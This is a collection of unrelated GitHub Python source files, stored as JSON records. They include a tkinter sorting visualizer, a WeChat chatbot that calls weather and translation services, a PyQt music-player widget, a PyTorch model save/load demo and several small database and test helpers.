Sort\":\r\n sort_algorithms.bubble_sort(veri, grafik_olustur)\r\n elif algoritma_menusu.get() == \"Selection Sort\":\r\n sort_algorithms.selection_sort(veri, grafik_olustur)\r\n elif algoritma_menusu.get() == \"Insertion Sort\":\r\n sort_algorithms.insertion_sort(veri, grafik_olustur)\r\n elif algoritma_menusu.get() == \"Quick Sort\":\r\n sort_algorithms.quick_sort(veri,0,len(veri)-1,grafik_olustur)\r\n grafik_olustur(veri)\r\n elif algoritma_menusu.get() == \"Merge Sort\":\r\n sort_algorithms.merge_sort(veri,grafik_olustur)\r\n\r\nframe = Frame(root,width=450,height=100,bg=\"grey\")\r\nframe.grid(row=0,column=0,padx=10,pady=5)\r\n\r\ncanvas = Canvas(root,width=450,height=280,bg=\"pink\")\r\ncanvas.grid(row=1,column=0,padx=10,pady=5)\r\n\r\nLabel(frame,text=\"Algoritma Seçiniz: \",bg=\"grey\").grid(row=0,column=0,padx=5,pady=5,sticky=W)\r\nalgoritma_menusu = ttk.Combobox(frame,textvariable=secilen_algoritma,values=[\"Bubble Sort\",\"Merge Sort\",\"Quick Sort\",\"Selection Sort\",\"Insertion Sort\"])\r\nalgoritma_menusu.grid(row=0,column=1,padx=5,pady=5)\r\nalgoritma_menusu.current(0)\r\n\r\nButton(text=\"Sıralamayı\\nBaşlat\",command=baslat,bg=\"purple\").grid(row=1,column=1,padx=5,pady=5)\r\nButton(text=\"Rastgele\\nOluştur\",command=rastgele_olustur,bg=\"purple\").grid(row=0,column=1,padx=5,pady=5)\r\n\r\nLabel(frame,text=\"Dizi Boyutu\", bg=\"purple\").grid(row=1,column=0,padx=5,pady=5,sticky=W)\r\nboyut =Entry(frame)\r\nboyut.insert(0,\"10\")\r\nboyut.grid(row=1,column=1,padx=5,pady=5,sticky=W)\r\n\r\nLabel(frame,text=\"Minimum\\nDeğer\", bg=\"purple\").grid(row=1,column=2,padx=5,pady=5,sticky=W)\r\nmin_deger = Entry(frame)\r\nmin_deger.grid(row=1,column=3,padx=5,pady=5,sticky=W)\r\n\r\nLabel(frame,text=\"Maksimum\\nDeğer\", bg=\"purple\").grid(row=1,column=4,padx=5,pady=5,sticky=W)\r\nmax_deger = Entry(frame)\r\nmax_deger.grid(row=1,column=5,padx=5,pady=5,sticky=W)\r\n\r\nroot.mainloop()\r\n\r\n","repo_name":"sumeyyebusra/Python-Projects","sub_path":"algorithm_visualizer/algorith_visualizer.py","file_name":"algorith_visualizer.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"29588335938","text":"import json,random,re,os,time,hashlib\nimport itchat,requests\nfrom itchat.content import *\nfrom urllib import parse\n\n\ndef create_md5(string):#生成md5值\n text= hashlib.md5()\n text.update(string.encode(encoding='utf-8'))\n hl = text.hexdigest()\n return hl\n\n\n\ndef process(info,userid):\n name = itchat.search_friends(userName=userid)['RemarkName'] if itchat.search_friends(userName=userid)['RemarkName'] != '' else itchat.search_friends(userName=userid)['NickName']\n if info == '笑话':\n print('收到了{}的笑话请求'.format(name))\n xiaohua(userid)\n elif info[-2:] == '天气':\n print('收到{}的天气请求'.format(name))\n tianqi(info,userid)\n elif info == '我的头像':\n print('收到{}的头像请求'.format(name))\n getHeadImg(userid)\n else:\n print('收到{}的翻译请求'.format(name))\n translate(info,userid)\n\n\n\n #功能模块\n##########################################################\ndef translate(words,userid):#翻译单词\n ts = '' + str(int(time.time()*1000))\n salt = ts + str(random.randint(0,9))\n sign = create_md5('fanyideskweb' + words + salt + 'n%A-rKaT5fb[Gy?;N5@Tj')\n bv = create_md5('5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36')\n\n url = 'http://fanyi.youdao.com/translate_o?smartresult=dict&smartresult=rule'\n headers = {\n 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36',\n 'Referer':'http://fanyi.youdao.com/',\n 'Cookie':'OUTFOX_SEARCH_USER_ID=-1230324205@106.34.48.35; OUTFOX_SEARCH_USER_ID_NCOO=2014994095.072274; JSESSIONID=aaaHQbw0exCA0erFGop0w; ___rl__test__cookies=1567933779347',\n 'Host':'fanyi.youdao.com'\n }\n data = {\n 'i':words,\n 'from':'AUTO',\n 'to':'AUTO',\n 'smartresult':'dict',\n 'client':'fanyideskweb',\n 'salt':salt,\n 'sign':sign,\n 'ts':ts,\n 'bv':bv,\n 'doctype':'json',\n 'version':'2.1',\n 'keyfrom':'fanyi.web',\n 'action':'FY_BY_REALTlME'\n }\n result = requests.post(url,data=data,headers=headers).json()\n result = result['translateResult'][0][0]['tgt']\n itchat.send(result,toUserName=userid)\n\n\ndef xiaohua(userid):#处理笑话请求\n try:\n url = 'https://www.apiopen.top/satinApi?type=2&page=1'\n html = requests.get(url).content.decode('utf-8')\n xh_lists = json.loads(html)\n xh_info = xh_lists['data']\n # pprint.pprint(xh)\n lists = []\n for i in xh_info:\n lists.append(i['text'])\n xh = random.choice(lists)\n itchat.send(xh,toUserName=userid)\n except:\n itchat.send('请求失败!请稍后重试!',toUserName=userid)\n\n\n\ndef tianqi(info,userid):#处理天气信息\n city = re.findall(r'(.*?)天气', info)[0]\n city = parse.quote(city)\n url = 'https://www.apiopen.top/weatherApi?city={}'.format(city)\n try:\n tq = json.loads(requests.get(url).content.decode('utf-8'))\n if tq['code'] == '201':\n itchat.send(tq['msg'], toUserName=userid)\n else:\n tq_info = tq['data']\n city_info = tq_info['city']\n date = tq_info['forecast'][0]['date'] # 日期\n fengli = re.findall('\\d', tq_info['forecast'][0]['fengli'])[0] # 风力\n fengxiang = tq_info['forecast'][0]['fengxiang'] # 风向\n high = tq_info['forecast'][0]['high'] # 最高温度\n low = tq_info['forecast'][0]['low'] # 最低温度\n type = tq_info['forecast'][0]['type'] # 天气类型\n ganmao = tq_info['ganmao']\n itchat.send(\n '{}天气信息:\\n日期:{}\\n温度:{},{}\\n风力:{}级\\n风向:{}\\n天气类型:{}\\n感冒指数:{}'.format(city_info, date, high, low, fengli,\n fengxiang, type, ganmao),\n toUserName=userid)\n except:\n itchat.send('请求出错!\\n请判断城市输入是否有误!', toUserName=userid)\n\ndef getHeadImg(userid):#获取头像\n head_img = itchat.get_head_img(userName=userid)\n imgName = itchat.search_friends(userName=userid)['RemarkName'] if itchat.search_friends(userName=userid)['RemarkName'] != '' else itchat.search_friends(userName=userid)['NickName']\n with open('1.jpg','wb')as f:\n f.write(head_img)\n itchat.send_image('1.jpg',toUserName=userid)\n os.remove('1.jpg')\n\n\n@itchat.msg_register(TEXT,isFriendChat=True)\ndef getInfo(msg):\n userid = msg['FromUserName']\n info = msg['Text']\n process(info,userid)\n\n\nif __name__ == '__main__':\n itchat.auto_login(hotReload=True)\n itchat.run()","repo_name":"ubadly/wechat_robot","sub_path":"robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":4795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"39013953367","text":"#!/usr/bin/env python3\n\"\"\"\nFind open-access LicensePools that do not have a Hyperlink\nwith an open access rel. If they have a delivery mechanism with\na resource, create a Hyperlink for the resource and identifier.\n\"\"\"\n\nimport os\nimport sys\n\nbin_dir = os.path.split(__file__)[0]\npackage_dir = os.path.join(bin_dir, \"..\")\nsys.path.append(os.path.abspath(package_dir))\n\nfrom core.model import ( # noqa: E402,F401\n production_session,\n Hyperlink,\n LicensePool,\n Resource,\n get_one_or_create,\n)\n\n_db = production_session()\n\nopen_access_pools = _db.query(LicensePool).filter(LicensePool.open_access==True) # noqa: E712,E225\n\npools_with_open_access_links = _db.query(LicensePool).join(\n Hyperlink,\n Hyperlink.identifier_id==LicensePool.identifier_id # noqa: E225\n ).filter(\n Hyperlink.rel==Hyperlink.OPEN_ACCESS_DOWNLOAD # noqa: E225\n ).filter(\n LicensePool.open_access==True # noqa: E225,E712\n )\n\npool_ids_with_open_access_links = [pool.id for pool in pools_with_open_access_links]\n\nopen_access_pools_without_open_access_links = open_access_pools.filter(~LicensePool.id.in_(pool_ids_with_open_access_links)) # noqa: E501\n\nprint(\"Found %d open access pools without open access links\" % open_access_pools_without_open_access_links.count())\n\nfixed = 0\nno_identifier = 0\nno_resource = 0\n\nfor pool in open_access_pools_without_open_access_links:\n\n if not pool.identifier:\n no_identifier += 1\n continue\n\n # Do we have a resource for this pool?\n if pool.delivery_mechanisms and pool.delivery_mechanisms[0].resource:\n resource = pool.delivery_mechanisms[0].resource\n identifier = pool.identifier\n\n link, is_new = get_one_or_create(\n _db, Hyperlink, identifier=identifier,\n resource=resource, license_pool=pool,\n data_source=pool.data_source, rel=Hyperlink.OPEN_ACCESS_DOWNLOAD,\n )\n\n if not is_new:\n print(\"Expected to create a new open access link for pool %s but one already existed\" % pool)\n else:\n fixed += 1\n pool.presentation_edition.set_open_access_link()\n\n if not fixed % 20:\n _db.commit()\n else:\n no_resource += 1\n\n_db.commit()\nprint(\"Fixed %d pools\" % fixed)\nprint(\"%d pools with no resource were not fixed\" % no_resource)\nprint(\"%d pools with no identifier were not fixed\" % no_identifier)\n","repo_name":"NYPL-Simplified/circulation","sub_path":"migration/20160722-fix-missing-hyperlinks.py","file_name":"20160722-fix-missing-hyperlinks.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"41"} +{"seq_id":"2447190702","text":"from typing import Optional, Union\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QKeySequence\nfrom PyQt5.QtWidgets import QHBoxLayout, QWidget, QVBoxLayout, QShortcut\n\nfrom modules.helpers.types.Decorators import override, connector\nfrom modules.models.view.builder.FontBuilder import FontBuilder\nfrom modules.models.view.builder.IconButtonStyle import IconButtonStyle\nfrom modules.models.view.builder.TextStyle import TextStyle\nfrom modules.screens.AbstractScreen import BaseView\nfrom modules.statics.view.Material import Paddings, Icons, Colors, Backgrounds, ColorBoxes\nfrom modules.widgets.Buttons import IconButton\nfrom modules.widgets.Cover import Cover, CoverProp\nfrom modules.widgets.Labels import LabelWithDefaultText\n\n\nclass MusicPlayerLeftSide(QHBoxLayout, BaseView):\n __song_info_layout: QVBoxLayout = None\n __play_buttons: QHBoxLayout = None\n\n __song_cover: Cover = None\n __label_song_artist: LabelWithDefaultText = None\n __label_song_title: LabelWithDefaultText = None\n\n __btn_prev_song: IconButton = None\n __btn_play_song: IconButton = None\n __btn_pause_song: IconButton = None\n __btn_next_song: IconButton = None\n\n def __init__(self, parent: Optional[\"QWidget\"] = None):\n super().__init__(parent)\n self.__is_playing_song = False\n self.__init_ui()\n self.set_is_playing(False)\n self.assign_shortcuts()\n\n def __init_ui(self) -> None:\n self.__song_cover = Cover()\n self.__song_cover.setFixedSize(64, 64)\n self.addWidget(self.__song_cover)\n\n self.__label_song_title = LabelWithDefaultText.build(\n width=128,\n font=FontBuilder.build(size=10, bold=True),\n light_mode_style=TextStyle(text_color=ColorBoxes.BLACK),\n dark_mode_style=TextStyle(text_color=ColorBoxes.WHITE)\n )\n self.__label_song_artist = LabelWithDefaultText.build(\n width=128,\n font=FontBuilder.build(size=9),\n light_mode_style=TextStyle(text_color=ColorBoxes.BLACK),\n dark_mode_style=TextStyle(text_color=ColorBoxes.WHITE)\n )\n\n self.__song_info_layout = QVBoxLayout()\n self.__song_info_layout.setContentsMargins(0, 0, 0, 0)\n self.__song_info_layout.setSpacing(0)\n\n self.addLayout(self.__song_info_layout, stretch=1)\n\n self.__song_info_layout.addStretch(0)\n self.__song_info_layout.addWidget(self.__label_song_title)\n self.__song_info_layout.addWidget(self.__label_song_artist)\n self.__song_info_layout.addStretch(0)\n\n # =================PREVIOUS - PLAY - NEXT=================\n self.__play_buttons = QHBoxLayout()\n self.__play_buttons.setContentsMargins(0, 0, 0, 0)\n self.__play_buttons.setSpacing(8)\n self.addLayout(self.__play_buttons)\n\n self.__btn_prev_song = IconButton.build(\n padding=Paddings.RELATIVE_50,\n size=Icons.LARGE,\n style=IconButtonStyle(\n light_mode_icon=Icons.PREVIOUS.with_color(Colors.PRIMARY),\n light_mode_background=Backgrounds.CIRCLE_HIDDEN_PRIMARY_10,\n )\n )\n self.__play_buttons.addWidget(self.__btn_prev_song)\n\n self.__btn_play_song = IconButton.build(\n padding=Paddings.RELATIVE_50,\n size=Icons.X_LARGE,\n style=IconButtonStyle(\n light_mode_icon=Icons.PLAY.with_color(Colors.PRIMARY),\n dark_mode_icon=Icons.PLAY.with_color(Colors.WHITE),\n light_mode_background=Backgrounds.CIRCLE_PRIMARY_10,\n dark_mode_background=Backgrounds.CIRCLE_PRIMARY,\n ),\n )\n self.__play_buttons.addWidget(self.__btn_play_song)\n\n self.__btn_pause_song = IconButton.build(\n padding=Paddings.RELATIVE_50,\n size=Icons.X_LARGE,\n style=IconButtonStyle(\n light_mode_icon=Icons.PAUSE.with_color(Colors.PRIMARY),\n dark_mode_icon=Icons.PAUSE.with_color(Colors.WHITE),\n light_mode_background=Backgrounds.CIRCLE_PRIMARY_10,\n dark_mode_background=Backgrounds.CIRCLE_PRIMARY,\n )\n )\n self.__play_buttons.addWidget(self.__btn_pause_song)\n\n self.__btn_next_song = IconButton.build(\n padding=Paddings.RELATIVE_50,\n size=Icons.LARGE,\n style=IconButtonStyle(\n light_mode_icon=Icons.NEXT.with_color(Colors.PRIMARY),\n light_mode_background=Backgrounds.CIRCLE_HIDDEN_PRIMARY_10,\n )\n )\n self.__play_buttons.addWidget(self.__btn_next_song)\n\n @override\n def assign_shortcuts(self) -> None:\n play_shortcut = QShortcut(QKeySequence(Qt.Key_Space), self.__btn_play_song)\n play_shortcut.activated.connect(self.__btn_play_song.click)\n\n pause_shortcut = QShortcut(QKeySequence(Qt.Key_Space), self.__btn_pause_song)\n pause_shortcut.activated.connect(self.__btn_pause_song.click)\n\n prev_shortcut = QShortcut(QKeySequence(Qt.Key_Left), self.__btn_prev_song)\n prev_shortcut.activated.connect(self.__btn_prev_song.click)\n\n next_shortcut = QShortcut(QKeySequence(Qt.Key_Right), self.__btn_next_song)\n next_shortcut.activated.connect(self.__btn_next_song.click)\n\n @override\n def apply_light_mode(self) -> None:\n self.__btn_next_song.apply_light_mode()\n self.__btn_prev_song.apply_light_mode()\n self.__btn_play_song.apply_light_mode()\n self.__btn_pause_song.apply_light_mode()\n self.__label_song_title.apply_light_mode()\n self.__label_song_artist.apply_light_mode()\n\n @override\n def apply_dark_mode(self) -> None:\n self.__btn_next_song.apply_dark_mode()\n self.__btn_prev_song.apply_dark_mode()\n self.__btn_play_song.apply_dark_mode()\n self.__btn_pause_song.apply_dark_mode()\n self.__label_song_title.apply_dark_mode()\n self.__label_song_artist.apply_dark_mode()\n\n @connector\n def set_onclick_prev_song(self, fn: callable) -> None:\n self.__btn_prev_song.clicked.connect(lambda: fn())\n\n @connector\n def set_onclick_play_song(self, fn: callable) -> None:\n self.__btn_play_song.clicked.connect(lambda: self.__onclick_play(fn))\n\n @connector\n def set_onclick_pause_song(self, fn: callable) -> None:\n self.__btn_pause_song.clicked.connect(lambda: self.__onclick_pause(fn))\n\n def __onclick_play(self, fn: callable) -> None:\n self.set_is_playing(True)\n fn()\n\n def __onclick_pause(self, fn: callable) -> None:\n self.set_is_playing(False)\n fn()\n\n @connector\n def set_onclick_next_song(self, fn: callable) -> None:\n self.__btn_next_song.clicked.connect(lambda: fn())\n\n def set_default_cover(self, byte_pixmap: bytes) -> None:\n cover = self.__create_cover(byte_pixmap)\n self.__song_cover.set_default_cover(cover)\n\n def set_default_title(self, text: str) -> None:\n self.__label_song_title.set_default_text(text)\n\n def set_default_artist(self, text: str) -> None:\n self.__label_song_artist.set_default_text(text)\n\n def set_cover(self, byte_pixmap: bytes) -> None:\n self.__song_cover.set_cover(self.__create_cover(byte_pixmap))\n\n def set_title(self, text: str) -> None:\n self.__label_song_title.setText(text)\n\n def set_artist(self, text: str) -> None:\n self.__label_song_artist.setText(text)\n\n def set_is_playing(self, enable: bool) -> None:\n self.__is_playing_song = enable\n self.__btn_play_song.setVisible(not enable)\n self.__btn_pause_song.setVisible(enable)\n\n def is_playing(self) -> bool:\n return self.__is_playing_song\n\n @staticmethod\n def __create_cover(byte_pixmap: bytes) -> Union[CoverProp, None]:\n if byte_pixmap is None:\n return None\n return CoverProp.from_bytes(byte_pixmap, width=64, height=64, radius=16)\n","repo_name":"Ananta0810/Meelody","sub_path":"modules/screens/music_bar/MusicPlayerLeftSide.py","file_name":"MusicPlayerLeftSide.py","file_ext":"py","file_size_in_byte":7954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"11392705100","text":"#1--保存整个网络==torch.save(net,'文件名')\r\n# 加载时,得到整个网络==torch.load('文件名')\r\n#2--只保存网络的参数==torch.save(net.state_dict(),'文件名')\r\n# 加载前要先定义好和保存网络同样架构的网络,然后只需加载参数==net'.load_state_dict(torch.load_state_dict('文件名'))\r\n\r\nimport torch\r\nimport matplotlib.pyplot as plt\r\n\r\nx=torch.unsqueeze(torch.linspace(-1,1,100),dim=1)\r\ny=x.pow(2)+0.1*torch.normal(torch.zeros(x.size()))\r\n\r\ndef save():\r\n net1=torch.nn.Sequential(\r\n torch.nn.Linear(1,20),\r\n torch.nn.ReLU(),\r\n torch.nn.Linear(20,1)\r\n )\r\n loss_func=torch.nn.MSELoss()\r\n optimizer=torch.optim.Adam(net1.parameters(),lr=0.02)\r\n\r\n for t in range(100):\r\n prediction = net1(x)\r\n loss = loss_func(prediction, y)\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n # plot result\r\n plt.figure(1, figsize=(10, 3))\r\n plt.subplot(131)\r\n plt.title('Net1')\r\n plt.scatter(x.data.numpy(), y.data.numpy())\r\n plt.plot(x.data.numpy(), prediction.data.numpy(), 'r-', lw=5)\r\n\r\n #训练结束后,保存模型\r\n torch.save(net1,'net1.pkl')\r\n #只保存参数\r\n torch.save(net1.state_dict(),'net1_params.pkl')\r\n\r\ndef reload():\r\n net2=torch.load('net1.pkl')\r\n predict=net2(x)\r\n # plot result\r\n plt.subplot(132)\r\n plt.title('Net2')\r\n plt.scatter(x.data.numpy(), y.data.numpy())\r\n plt.plot(x.data.numpy(), predict.data.numpy(), 'r-', lw=5)\r\n\r\ndef reload_param():\r\n net3=torch.nn.Sequential(\r\n torch.nn.Linear(1, 20),\r\n torch.nn.ReLU(),\r\n torch.nn.Linear(20, 1)\r\n )\r\n net3.load_state_dict(torch.load('net1_params.pkl'))\r\n predict = net3(x)\r\n\r\n # plot result\r\n plt.subplot(133)\r\n plt.title('Net3')\r\n plt.scatter(x.data.numpy(), y.data.numpy())\r\n plt.plot(x.data.numpy(), predict.data.numpy(), 'r-', lw=5)\r\n plt.show()\r\n\r\nif __name__=='__main__':\r\n save()\r\n\r\n reload()\r\n\r\n reload_param()","repo_name":"PeakGe/pytorch_learn","sub_path":"save_reload_test.py","file_name":"save_reload_test.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"70247548923","text":"# This software and supporting documentation are distributed by\n# Institut Federatif de Recherche 49\n# CEA/NeuroSpin, Batiment 145,\n# 91191 Gif-sur-Yvette cedex\n# France\n#\n# This software is governed by the CeCILL license version 2 under\n# French law and abiding by the rules of distribution of free software.\n# You can use, modify and/or redistribute the software under the \n# terms of the CeCILL license version 2 as circulated by CEA, CNRS\n# and INRIA at the following URL \"http://www.cecill.info\". \n#\n# As a counterpart to the access to the source code and rights to copy,\n# modify and redistribute granted by the license, users are provided only\n# with a limited warranty and the software's author, the holder of the\n# economic rights, and the successive licensors have only limited\n# liability.\n#\n# In this respect, the user's attention is drawn to the risks associated\n# with loading, using, modifying and/or developing or reproducing the\n# software by the user in light of its specific status of free software,\n# that may mean that it is complicated to manipulate, and that also\n# therefore means that it is reserved for developers and experienced\n# professionals having in-depth computer knowledge. Users are therefore\n# encouraged to load and test the software's suitability as regards their\n# requirements in conditions enabling the security of their systems and/or \n# data to be ensured and, more generally, to use and operate it in the \n# same conditions as regards security.\n#\n# The fact that you are presently reading this means that you have had\n# knowledge of the CeCILL license version 2 and that you accept its terms.\n\nfrom __future__ import absolute_import\nfrom brainvisa.processes import *\nfrom brainvisa import anatomist\nfrom soma import aims\nimport numpy as np\nfrom brainvisa.cortical_surface.surface_tools import texture_tools as texTls\n\nname = 'Anatomist Show Texture Extrema As Spheres'\nroles = ('viewer',)\nuserLevel = 0\nallowed_processes = ()\n\ndef validation():\n anatomist.validation()\n\nsignature = Signature(\n 'texture', ReadDiskItem('texture', 'aims Texture formats'),\n 'white_mesh',ReadDiskItem( 'Hemisphere White Mesh', 'aims mesh formats' ),\n 'sphere_size', Float(),\n)\n\ndef initialization( self ):\n self.linkParameters('white_mesh','texture' )\n self.sphere_size = 1.0\n\ndef execution( self, context ):\n context.write('use temporary files...')\n spheres_mesh_file = context.temporary( 'GIFTI file' )\n spheres_texture_file = context.temporary( 'GIFTI file' )\n white_mesh = aims.read(self.white_mesh.fullPath())\n texture = aims.read(self.texture.fullPath())\n atex = np.array(texture[0])\n gen = aims.SurfaceGenerator()\n spheres_mesh = aims.AimsSurfaceTriangle()\n vert = np.array(white_mesh.vertex()) # vertex coordinates\n extrema_tex = texTls.TextureExtrema(white_mesh, atex)\n extrema = np.where(extrema_tex)[0]\n spheres_texture = list()\n nb_vert_s = 64\n for ex in extrema:\n spheres_mesh += gen.sphere(vert[ex], self.sphere_size,10)\n spheres_texture.extend(extrema_tex[ex]*np.ones((nb_vert_s,1),np.int16))\n\n a_tex_out = np.array(spheres_texture)\n tex_out = aims.TimeTexture_S16()\n tex_out[0].assign(a_tex_out)\n a = anatomist.Anatomist()\n win = a.createWindow( 'Axial' )\n objects = [win]\n if len(spheres_mesh.vertex()) != 0:\n anamesh = a.toAObject(spheres_mesh)\n anamesh.releaseAppRef()\n anatex = a.toAObject(tex_out)\n anatex.releaseAppRef()\n anatex.setPalette('GREEN-RED-ufusion')\n fusionTexSurf = a.fusionObjects([anamesh, anatex],\n method='FusionTexSurfMethod')\n fusionTexSurf.releaseAppRef()\n win.addObjects( fusionTexSurf )\n objects += [fusionTexSurf]\n anamesh2 = a.toAObject(white_mesh)\n anamesh2.releaseAppRef()\n anatex2 = a.toAObject(texture)\n anatex2.releaseAppRef()\n anatex2.setPalette('Purple-Red + Stripes')\n fusionTexSurf2 = a.fusionObjects([anamesh2, anatex2],\n method='FusionTexSurfMethod')\n fusionTexSurf2.releaseAppRef()\n objects.append(fusionTexSurf2)\n win.addObjects( fusionTexSurf2 )\n return objects\n #return [win, anamesh,anatex,fusionTexSurf,anamesh2,fusionTexSurf2]\n\n","repo_name":"brainvisa/cortical_surface-gpl","sub_path":"brainvisa/toolboxes/cortical_surface/processes/viewers/AnatomistShowTextureExtremaAsSpheres.py","file_name":"AnatomistShowTextureExtremaAsSpheres.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"38702155285","text":"'''\n11.3.1 누락된 키 처리하기 setdefault() 와 defaultdict()\n딕셔너리에 존재하지 않는 키로 접근하면 예외가 발생한다. 기본값을 봔한하는 딕셔너리의 get함수를 사용하면\n이 예외를 피할 수 있다. setdefault() 함수는 get() 함수와 같지만 키가 누락된 경우 딕셔너리에 항복을 할당할 수 있다\n\n'''\n# p_table = {'aa':'aaa','bb':'bbb'}\n# print(p_table)\n# p_table.setdefault('cc','ccc')\n# print(p_table)\n\nfoodcount = {}\nfor food in ['egg','spam','spam','spam']:\n if not food in foodcount:\n foodcount[food] = 0\n foodcount[food] +=1\nprint(foodcount)\n\nfrom collections import Counter\nbreakfast = ['egg','spam','spam','spam']\ntest = Counter(breakfast)\nprint(test)\nprint(test.most_common(1))","repo_name":"dron512/pyauto","sub_path":"20201224/ex05.py","file_name":"ex05.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"10253387788","text":"# coding=utf-8\nimport requests\nfrom unittesttool.Operation_excel import oper_excel\nimport json\nclass inter():\n# 构造函数\n# def __init__(self, url, data, method):\n# res = self.run_main(url, data, method)\n# return res\n\n# post接口结构\n # post请求,参数:data(设计参数),url指定\n def send_post(self, url, data, cookies = None,files= None):\n # allow_redirects=False:禁止重定向的自动跳转\n if files:\n res = requests.post(url=url, data=data, cookies=cookies, verify=False, allow_redirects=False,files = files)\n\n else:\n res = requests.post(url=url, data=data, cookies=cookies, verify=False, allow_redirects=False,files = None)\n if str(res.status_code).startswith('2'):\n # 201、202等,请求连接成功\n print('接口连接状态', res.status_code, '接口状态正常')\n return res.json(),res.url\n elif str(res.status_code).startswith('3'):\n # 301、302等,重定向\n # response的header中获取重定向指向地址-location\n direct_url = res.headers[\"Location\"]\n print(\"数据重定向指向该网址\",direct_url)\n print('接口连接状态', res.status_code, ',————')\n return res,direct_url\n else:\n print('______接口连接状态', res.status_code,',接口状态异常')\n # return res.json()\n # get接口结构\n def send_get(self, url,params, cookies = None,return_value=None):\n # if header != None:\n # print(\"---\",params,type(params))\n res = requests.get(url=url, params=params, cookies = cookies, verify=False,allow_redirects=False)\n # else:\n # res = requests.get(url=url, params=params, verify=False,allow_redirects=False)\n if str(res.status_code).startswith('2'):\n # 201、202等,请求连接成功\n print('接口连接状态', res.status_code, '接口状态正常')\n if return_value.startswith(\"y\") or return_value.startswith(\"Y\"):\n # 获取返回的data数据\n try:\n result = res.json()[\"Data\"][0]\n excel = oper_excel(filename=\"../global_var/depend_data.xls\")\n i = len(result)\n j = 0\n key= []\n value = []\n for k in result:\n key.append(k)\n value.append(result[k])\n for i in range (len(key)):\n excel.write_value(i,0,key[i])\n if type(value[i]) == dict:\n excel.write_value(i,1,str(value[i]))\n else:\n excel.write_value(i, 1,value[i])\n except Exception as e:\n print(e)\n # print(\"返回\",res,res.url)\n return res,res.url\n elif str(res.status_code).startswith('3'):\n # 301、302等,重定向\n # response的header中获取重定向指向地址-location\n direct_url = res.headers[\"Location\"]\n print(\"数据重定向指向该网址\", direct_url)\n print('接口连接状态', res.status_code)\n return res, direct_url\n else:\n print('接口连接状态', res.status_code, ',接口状态异常')\n\n def run_main(self, url, method, data=None, files= None, cookies = None,return_value=None):\n if method == 'GET':\n res,url = self.send_get(url,data,cookies,return_value=return_value)\n else:\n res,url = self.send_post(url, data,cookies, files)\n # res为json可以做断点检查 ,重新处理为非json格式\n # return json.dumps(res, ensure_ascii=False)\n try:\n return res.json(),url\n except Exception as e:\n print(\"未返回json格式数据\",e)\n return res,url\n","repo_name":"0xqq/iqidao_interface","sub_path":"unittesttool/Requestdemo.py","file_name":"Requestdemo.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"38315389871","text":"#!/user/bin/env python\n#_*_ coding:utf-8 _*_\nimport unittest\nimport requests\nfrom client import *\n\nclass GetpatientImList:\n '''获取患者列表'''\n def setUp(self):\n self.url = 'https://tyh.120yibao.com/yb/customer/doctor/patientImList'\n self.token = Client.TOKEN\n self.client = Client(url=self.url)\n def tearDown(self):\n self.client.result()\n def test_patientImList(self):\n cl = self.client\n cl.set_data({\"Yb-Yh-Client\":\"0\",\"Yb-Yh-Token\":self.token,\"doctorUserId\":\"141273\"})\n cl.send()\n cl.equal(cl.status_code,0)\n cl.less_than(cl.times,200)\n cl.equal(cl.json.get('info'),'请求成功')\n","repo_name":"hehe0001/yb_test","sub_path":"yb/PatientImList.py","file_name":"PatientImList.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"30964644668","text":"from typing import List\nimport sys\nimport shutil\nimport subprocess\n\n\ndef patch_sys_path() -> None:\n \"\"\"Modify sys.path to include all paths from the\n current environment.\n \"\"\"\n syspath = _get_external_sys_path()\n for each in reversed(syspath):\n if each not in sys.path:\n sys.path.insert(0, each)\n\n\ndef _get_external_sys_path() -> List[str]:\n executable = shutil.which(\"python\") or \"python\"\n if executable == sys.executable: # not in virtualenv\n return []\n ret = (\n subprocess.run(\n [executable, \"-c\", \"import sys; print(','.join(sys.path))\"],\n stdout=subprocess.PIPE,\n stderr=subprocess.DEVNULL,\n )\n .stdout.decode()\n .strip()\n )\n return ret.split(\",\")\n","repo_name":"sloria/ped","sub_path":"ped/pypath.py","file_name":"pypath.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"41"} +{"seq_id":"15619633915","text":"from app.allImports import *\nfrom app.updateCourse import *\nfrom app.models.models import *\nfrom app.logic.authorizedUser import AuthorizedUser\n# TODO: standarize docstring see https://www.python.org/dev/peps/pep-0257/\n\n\n'''\nadds the professors from a list to a database\n@param {list} professors - list of professors to be added\n@param {int} cid = the course id the where the instructors need to be added to\n'''\n\n\ndef addCourseInstructors(instructors, cid):\n for instructor in instructors:\n InstructorCourse(username=instructor, course=cid).save()\n\ndef addSTCourseInstructors(instructors, stid):\n for instructor in instructors:\n InstructorSTCourse(username=instructor, course=stid).save()\n\n'''\nadds division chair to database\n@param {list} users - list of users that need to be added as division chair\n@param {int} did - the division id where the division chairs are added to\n'''\n\n\ndef addDivisionChairs(users, did):\n for user in users:\n DivisionChair(username=user, did=did).save()\n\n'''\nadds division chair to database\n@param {list} users - list of users that need to be added as program chair\n@param 